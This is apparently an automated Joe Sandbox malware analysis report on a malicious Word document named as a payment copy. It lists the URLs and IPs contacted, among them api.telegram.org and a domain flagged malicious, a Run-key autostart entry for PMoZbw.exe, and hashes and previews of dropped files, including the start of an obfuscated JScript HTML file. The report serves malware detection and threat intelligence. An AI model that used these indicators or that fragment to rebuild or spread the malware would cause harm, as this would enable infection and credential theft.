                                                                                                      http://fontfabrik.comPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://api.telegram.org4PROMZwFp385vXrN.exe, 00000011.00000002.629483672.0000000003370000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.monotype.sPROMZwFp385vXrN.exe, 0000000F.00000003.504305788.0000000005C5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                        high
                                                                                                        http://DynDns.comDynDNSnamejidpasswordPsi/PsiPROMZwFp385vXrN.exe, 00000011.00000002.621651605.00000000030C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.jiyu-kobo.co.jp/e=PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/c2r/v1.0/InteractiveInstallation059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                          high
                                                                                                          http://www.fontbureau.comrsivPROMZwFp385vXrN.exe, 0000000F.00000003.507273478.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.507759248.0000000005C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.fonts.comPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.sandoll.co.krPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://graph.windows.net/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                              high
                                                                                                              https://devnull.onenote.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                high
                                                                                                                https://messaging.office.com/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                    high
                                                                                                                    https://skyapi.live.net/Activity/059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.tiro.comf(PROMZwFp385vXrN.exe, 0000000F.00000003.496556163.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496660729.0000000005C22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    low
                                                                                                                    https://api.cortana.ai059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://messaging.action.office.com/setcampaignaction059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                      high
                                                                                                                      https://visio.uservoice.com/forums/368202-visio-on-devices059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                        high
                                                                                                                        https://staging.cortana.ai059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://onedrive.live.com/embed?059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                          high
                                                                                                                          https://augloop.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                            high
                                                                                                                            http://www.jiyu-kobo.co.jp/jp/PROMZwFp385vXrN.exe, 0000000F.00000003.500643017.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501028952.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://api.diagnosticssdf.office.com/v2/file059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                              high
                                                                                                                              https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.diagnostics.office.com059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designers/cabarga.htmlNPROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.founder.com.cn/cnPROMZwFp385vXrN.exe, 0000000F.00000003.496449471.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.597253732.0000000006E22000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496074815.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496494097.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496292759.0000000005C42000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496697085.0000000005C43000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.496527277.0000000005C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.jiyu-kobo.co.jp/w=PROMZwFp385vXrN.exe, 0000000F.00000003.501470358.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000003.502412410.0000000005C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://store.office.de/addinstemplate059BE406-184C-47DB-8766-13F9D87050E0.0.drfalse
                                                                                                                                      high
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      64.185.227.156
                                                                                                                                      api4.ipify.orgUnited States
                                                                                                                                      18450WEBNXUSfalse
                                                                                                                                      118.27.125.229
                                                                                                                                      pzsrblog.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                      IP
                                                                                                                                      192.168.2.1
                                                                                                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                      Analysis ID:770660
                                                                                                                                      Start date and time:2022-12-20 14:13:24 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 12m 2s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:light
                                                                                                                                      Sample file name:Payment copy_2911022.docx.doc
                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                      Number of new started drivers analysed:1
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.spyw.expl.evad.winDOC@18/35@9/3
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      HDC Information:Failed
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .doc
                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                      • Attach to Office via COM
                                                                                                                                      • Scroll down
                                                                                                                                      • Close Viewer
                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.24, 20.234.90.154, 20.223.130.133
                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      TimeTypeDescription
                                                                                                                                      14:16:10API Interceptor1x Sleep call for process: PROMZwFp385vXrN.exe modified
                                                                                                                                      14:16:34AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
                                                                                                                                      14:16:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe
                                                                                                                                      14:16:46API Interceptor1x Sleep call for process: PMoZbw.exe modified
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      No context
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1216
                                                                                                                                      Entropy (8bit):5.355304211458859
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                                                                      MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                                                                      SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                                                                      SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                                                                      SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:Microsoft Access Database
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):528384
                                                                                                                                      Entropy (8bit):0.4753811856098096
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:/fXyy8gcryGVCINYqP2oiS+XpFY/7B8yk/bgCBH0Zz7kj/1I:/fCCBH057YdI
                                                                                                                                      MD5:2FBB6AD85C9B8A3CFF19503506735D17
                                                                                                                                      SHA1:73AFEA2A4F15EFAACFAEA846C6A628DA84C04CEB
                                                                                                                                      SHA-256:24036F80ABF535E77E8537BA2F5D315CD13AAE6173BFA758DA10A09858674123
                                                                                                                                      SHA-512:2879BDB5F6F8E59A50FF197A95DE9A0665B6D98AC427A24E3079790424F725EC7476A74D052D1F34E2E5E1823F39420937D5C6D44D1C8582FB3B4C90A3BC087D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N.T.7.....(.`..`';{6....[.C...3G.y[..|*..|......59h..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):36
                                                                                                                                      Entropy (8bit):2.730660070105504
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                      MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                      SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                      SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                      SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):1.4172860556164644
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:LVXHaV:R3u
                                                                                                                                      MD5:546B1C7D84776ECF38D2210A8F145AF4
                                                                                                                                      SHA1:F22B54B7CC0AAA9ABDA0474B22270004B547361A
                                                                                                                                      SHA-256:9C1FD366ED3B66F2AB4715459B87CD8B7F289C9ED0C7DAE480D71A8727E23734
                                                                                                                                      SHA-512:B278A80D43CAE9D873C839FBE49E1C7196E497E6CA96E2192C9E25B38C3EE5974AA18417D09C685FE64008286FF016E8B87F0EA4521E2DE6B4E40578253C2808
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:061544. Admin.
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):151489
                                                                                                                                      Entropy (8bit):5.3565536880159055
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:F+C7/gUbB5BQguwU1Q9DQe+zQVk4F77nXmvidlXRHE6Lcz6I:f2Q9DQe+zwXel
                                                                                                                                      MD5:8A142F0A7799ABC0DA586FCE6D4EDA59
                                                                                                                                      SHA1:0685020CC7946554AE9EBDDA80000A69A971AECF
                                                                                                                                      SHA-256:50684A258415BF9A08B3D8177FD499FF55F8131EA513828443672A274E175C62
                                                                                                                                      SHA-512:CA7CBB4B5A5A59559C8D6DF8A5EFB9DB95C6A1D1EF2CCDB6783532EA984B6ABB8843924A56595A546B2FEAAEFB0DB918D33D06379D43953C48256F483A0335B8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-12-20T13:14:21">.. Build: 16.0.16012.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8032
                                                                                                                                      Entropy (8bit):6.106485999431441
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
                                                                                                                                      MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
                                                                                                                                      SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
                                                                                                                                      SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
                                                                                                                                      SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=11, description=OLYMPUS DIGITAL CAMERA , model=SP500UZ, software=Corel Photo Album 6, datetime=2007:10:21 17:05:13], baseline, precision 8, 480x640, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):111840
                                                                                                                                      Entropy (8bit):7.447827528335342
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:/y1vPicYqXVc2XcRz09vkDMaIRFzOuPiSlKd9Y:qdfYqX6G00zfaSlWY
                                                                                                                                      MD5:4D697D690AB2D1BAC4998162A6EEAE07
                                                                                                                                      SHA1:6864EAD35FB3B3FBE354AC8D7BC3AFA3204B9522
                                                                                                                                      SHA-256:23D679960625F65787692D74E87E324E5304B7F923E340322575D330FE510450
                                                                                                                                      SHA-512:201266787A62F1603C7B908A74B7FBE5A06E38CF581B8B8F8D8D56F9804C6020822E1C3B799321980DAD326E751CE9E0C969979BC96D4A62AC25D7C4259574A9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....`.`.....vExif..MM.*............. .................1...........2..................................Q...........Q........!..Q........!...i..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8032
                                                                                                                                      Entropy (8bit):6.106485999431441
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
                                                                                                                                      MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
                                                                                                                                      SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
                                                                                                                                      SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
                                                                                                                                      SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:Targa image data - Color 32 x 7 x 32 +32 +7 "\007"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):22016
                                                                                                                                      Entropy (8bit):3.738318846351647
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:L/1OrOnuOfOaOiA48zmF6csq6iCXswJL9flwUJM4ZnI0TilzSBzH68NkvHeuSANZ:LAyfW7F93jMLLeE9
                                                                                                                                      MD5:479F53CA35C4CCACB5BB7B2C159E0AC1
                                                                                                                                      SHA1:B93AE1BD5919EDD56D46B7CCA3D7A18B395ED4B6
                                                                                                                                      SHA-256:7A312044D76262BA775A8CDF4A2A4CE63E77D4B7ABBB6A463CFF321322CC59FA
                                                                                                                                      SHA-512:761101D71A3EAEDB308E824C9F43248B0CB2B1912CFE6FF4459BEC5DEDCD8226223C2509E66CB94ED46B7EB71448005DAB9BF524E0622133A5A8B42F0BA1FDE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.. ..... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ... ... ... ... ... ... ... ... ... ..... ...P.R.O.-.F.O.R.M.A. .I.N.V.O.I.C.E..... ....... ...C.o.m.p.a.n.y. .:...A.L. .J.A.D.D. .T.R.A.D.I.N.G. .&.C.O.N.T...E.S.T.....I.n.v.o.i.c.e. .#. .:. .1.4.7.1.9..... .....A.d.d.r.e.s.s. .:...S.A.L.A.L.A.H...O.M.A.N.....D.a.t.e. .:...1.7.-.0.7.-.2.0.1.9..... ......... ......... .....T.e.l. .:............................................. ...$...............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1024
                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (6346), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8032
                                                                                                                                      Entropy (8bit):6.106485999431441
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+Y8gdLn2wOlVE82u5WUqhy0J2bnR5PojA6pAohjN6pKpGPZCzYw9gz1fUIN3U0s:+Y7L2wO9IUNv5PoV6w6peGRx7pE0s
                                                                                                                                      MD5:7934E5C18F2C7C53DCE7C8C7CE55125D
                                                                                                                                      SHA1:8C75630C574D0745E4F3B71B26057C990E2BB467
                                                                                                                                      SHA-256:7C92FD542BC5E2B201FB2DE4FC1DACE37FF9DFC02CE40FD1BD26E61ED41DB3EA
                                                                                                                                      SHA-512:1E8D31AF033C0E3DF7D4DCF427D92702F733E13CE1686E0E1BDB0711E882F2AE18C479F363A535B366D1A4838E363C163513B7091DD81CBD9961D18C1C293C13
                                                                                                                                      Malicious:false
